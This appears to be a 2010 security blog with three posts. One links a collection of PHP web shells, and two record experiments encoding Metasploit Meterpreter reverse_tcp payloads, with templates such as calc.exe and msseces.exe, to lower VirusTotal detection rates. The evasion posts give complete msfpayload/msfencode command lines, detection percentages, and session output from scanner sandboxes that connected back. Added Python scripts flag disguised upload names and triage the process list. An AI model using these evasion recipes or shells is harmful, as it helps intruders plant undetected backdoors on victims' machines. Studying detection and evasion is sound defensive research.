Wednesday, March 31, 2010

php shell scripts

Today I found an interesting collection of PHP shell scripts; feel free to check it out if you are interested. There is also a nice collection from DK at http://michaeldaw.org/projects/web-backdoor-compilation.

Names:
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php

Some are modified versions of c99.php, some seem custom.
Link to download here.
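The names above show the pattern defenders should catch in upload handling: a script extension placed before a harmless-looking one (`.php.pjpeg`). Apache's mod_mime matches handlers against every extension segment of a filename, so a filter that only inspects the final extension can let these through. The following is an added example, not code from the post or from the shell collection it links to; the sample names are the ones listed above, while the function and the extension sets are this example's own.

```python
"""Flag upload filenames that carry a script extension anywhere in the name.

Added example, not part of the original post. The sample names are the ones
listed in the post; the function and the extension sets are this example's own.
"""
import os
from typing import Iterable, List, Tuple

# Names taken from the post's list (sample input).
UPLOADED_NAMES = [
    "120667kk.php.pjpeg", "420532Shell.php.pjpeg", "629788tryag.php", "681985c99.php",
    "951078biJ.php", "c99.php", "joomla.php", "mm.php", "Mohajer22-perl.pl", "O0O.php",
    "perl.pl", "sql.php", "style.php", "sym4.php", "Team SQL.php", "TrYaG.php", "update.php",
]

# Extensions a web server may hand to an interpreter. Apache's mod_mime matches
# handlers against every dot-separated segment, so "x.php.pjpeg" can still be run
# as PHP when a filter only inspects the last extension.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "pl", "cgi", "asp", "aspx", "jsp"}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "pjpeg", "png", "gif"}


def classify_upload_name(name: str) -> Tuple[bool, str]:
    """Return (reject, reason); every segment after the first dot counts as an extension."""
    base = os.path.basename(name.replace("\\", "/"))
    segments = base.lower().split(".")[1:]  # drop the stem, keep all extensions
    script = [s for s in segments if s in SCRIPT_EXTENSIONS]
    if not script:
        return False, "no script extension"
    if segments[-1] in IMAGE_EXTENSIONS:
        return True, f"script extension .{script[0]} hidden behind image extension .{segments[-1]}"
    return True, f"script extension .{script[0]}"


def rejected_uploads(names: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (name, reason) for every name that the check rejects."""
    out = []
    for name in names:
        reject, reason = classify_upload_name(name)
        if reject:
            out.append((name, reason))
    return out


if __name__ == "__main__":
    for name, reason in rejected_uploads(UPLOADED_NAMES):
        print(f"REJECT {name!r}: {reason}")
```

Every name in the list is rejected, the two `.php.pjpeg` ones with the "hidden behind" reason. For an upload handler the stronger design is to allow-list the final extension, store the file under a server-generated name and serve uploads from a directory with script execution disabled; the check above is the triage step to run over an existing upload directory.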

Tuesday, March 30, 2010

metasploit vs virustotal part 2

I really wanted to see what was inside the analysis folder and to get better statistics from the antivirus engines. At that time Metasploit had integrated a patch from scriptjunkie (http://www.metasploit.com/redmine/issues/1244), so I gave it a try as well.

Detection rates and examples follow; all rates are from VirusTotal:

(calc.exe is the calculator from Windows XP, and -k is the new msfencode option that binds the two files together and runs both, the payload in a separate thread.)

./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe

Result: 14/42 (33.34%)

As soon as I uploaded the file I got a connection on my multi/handler:

[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe

Too bad I didn't get to see the analysis folder I was looking for. The connection was dropped 2-3 seconds later; I assume the whole connection lasts about 10 seconds and the VM, from what it appears, is then rebooted or disconnected.

Trying again,

./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)

Same template, but without binding the exe files; not bad actually.

With a different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)

Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai, the default encoder, gave a result of 12/42 (28.58%).

I got almost the same results when increasing the encoding iterations to 15:
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)

And the last one, using the XOR encoder:
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)

Plain encoding of the payload with Shikata ga nai gives a detection rate of 20/42 (47.62%).

From what I noticed, binding the exe file raises the chances of detection. Most of the time the antivirus engines detecting the executables are the same: Microsoft, NOD32, Symantec, Sophos and something called McAfee-GW-Edition, which detects anything as a virus, even plain text and incomplete code.

I really didn't want to put Metasploit code into VirusTotal, but I haven't seen any actual tests and results anywhere. I did some tests on novirusthanks (http://scanner.novirusthanks.org/), but the scanner is slow, the results are poor and it has only half as many antivirus engines, 20.

That's all for now. I didn't manage to get the files I wanted, but I did get some detection results and some information from the VMs that were connecting back every time I uploaded a file. Files are available on request.

metasploit vs virustotal

A few days back I saw a post (http://practicalexploitation.com/post/417194846/rob-could-you-cover-anti-virus-evasion-i-was-going) on tactical exploitation from jeffhnet asking for help on bypassing AVGs. Trying to do the same, I started with Metasploit's meterpreter and the usual attempts to bypass AVG.

The first attempt got a high rate of red flags on VirusTotal and novirusthanks, around 35% to 40%. The command I had used was:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -t exe -o test1.exe

I changed the encoder and got slightly better results with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -e x86/call4_dword_xor -t exe -o test2-0.exe

Finally I ended up with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x msseces.exe -t exe -o test2-5-mss.exe

msseces.exe is the Microsoft antivirus and I used it as the template for msfencode. It produced a nice big exe that was almost undetectable: actually 3 hits on novirusthanks and 5/41 (12.2%) on VirusTotal (MD5: ca904e0c8ac8ec6e34b85f5c1c9b36bb). Roughly good results; the only thing bothering me was that the file was being detected by Microsoft, NOD32 and Symantec, but I settled for giving it another try the next day.

So today I fired up msfconsole and the multi handler to be ready to test my exe files, as I was going to scramble them with some commercial packers/encryptors/protectors. As I was going through a list of protectors to start with, I saw a strange connection to my console:

[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...

[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)

I immediately did an ls and saw the following:

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp

0B7BBu.exe was the same size as my file. The process list:

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1200 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1336 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.exe
940 alg.exe x86 C:\WINDOWS\System32\alg.exe
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe


So that's about it; the connection was dropped after that, and in a couple of days my file will be flagged as viral by more engines, I guess.
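The process list is the most useful part of this callback for an analyst: three cwstart.exe instances and popwack.exe run from C:\analysis\, and the sample itself runs from C:\0B7BBu.exe, none of which is a normal location for an executable on an XP system. The following is an added example, not code from the post; it parses a `ps` listing in the whitespace-separated form shown above and flags image paths outside the standard system and program directories. The sample listing is a constructed subset of the post's rows, and the allow-list, the path normalisation and the function names are this example's own.

```python
"""Triage a meterpreter-style process listing for executables in unexpected locations.

Added example, not from the original post. The sample listing is a constructed
subset of the rows shown in the post's `ps` output; the allow-list, the
normalisation rules and the function names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: columns are PID, Name, Arch, User, Path, separated by spaces.
# Kernel pseudo-processes have no user or path, and user names may contain spaces.
SAMPLE_PS = r"""
PID Name Arch User Path
--- ---- ---- ---- ----
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe
"""


@dataclass
class Proc:
    pid: int
    name: str
    arch: Optional[str]
    user: Optional[str]
    path: Optional[str]


# A path column starts with a drive letter ("C:\") or an NT-style prefix ("\SystemRoot\", "\??\").
_PATH_START = re.compile(r"^(?:[A-Za-z]:\\|\\)")

# Directories where image files are expected on a default XP install (lower-case, normalised).
EXPECTED_DIRS = ("c:\\windows\\", "c:\\program files\\")


def parse_ps(listing: str) -> List[Proc]:
    """Parse the space-separated listing; header, rule and blank lines are skipped."""
    procs: List[Proc] = []
    for line in listing.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not tokens[0].isdigit():
            continue
        pid, name, rest = int(tokens[0]), tokens[1], tokens[2:]
        arch = rest.pop(0) if rest and rest[0] in ("x86", "x64", "x86_64") else None
        # The user field may contain spaces, so locate the path by its prefix instead.
        path_idx = next((i for i, t in enumerate(rest) if _PATH_START.match(t)), None)
        if path_idx is None:
            user, path = (" ".join(rest) or None), None
        else:
            user, path = (" ".join(rest[:path_idx]) or None), " ".join(rest[path_idx:])
        procs.append(Proc(pid, name, arch, user, path))
    return procs


def normalize_path(path: str) -> str:
    """Map NT object-manager forms onto the Win32 form so one allow-list covers both."""
    p = path.lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    return p


def triage(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, name, reason) for processes whose image lies outside EXPECTED_DIRS."""
    findings = []
    for p in procs:
        if p.path is None:
            continue  # kernel pseudo-processes carry no image path
        norm = normalize_path(p.path)
        if norm.startswith(EXPECTED_DIRS):
            continue
        directory = norm.rsplit("\\", 1)[0] + "\\"
        if re.fullmatch(r"[a-z]:\\", directory):
            reason = "executable running from the volume root"
        else:
            reason = f"executable running outside expected directories ({directory})"
        findings.append((p.pid, p.name, reason))
    return findings


if __name__ == "__main__":
    for pid, name, reason in triage(parse_ps(SAMPLE_PS)):
        print(f"PID {pid:>5} {name:<14} {reason}")
```

On the sample the three flagged processes are the two C:\analysis\ tools and 0B7BBu.exe in the volume root; everything under C:\WINDOWS\ and C:\Program Files\, including the \SystemRoot\ and \??\ spellings, passes. The same allow-list approach works on any host process inventory, which is how a responder would spot a dropped binary like the one the callback here revealed.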

The next thing I'd like to do is find out where this connection came from. Was it because the file was on novirusthanks, which claims they do not distribute samples, or did it come from VirusTotal?

More in part 2.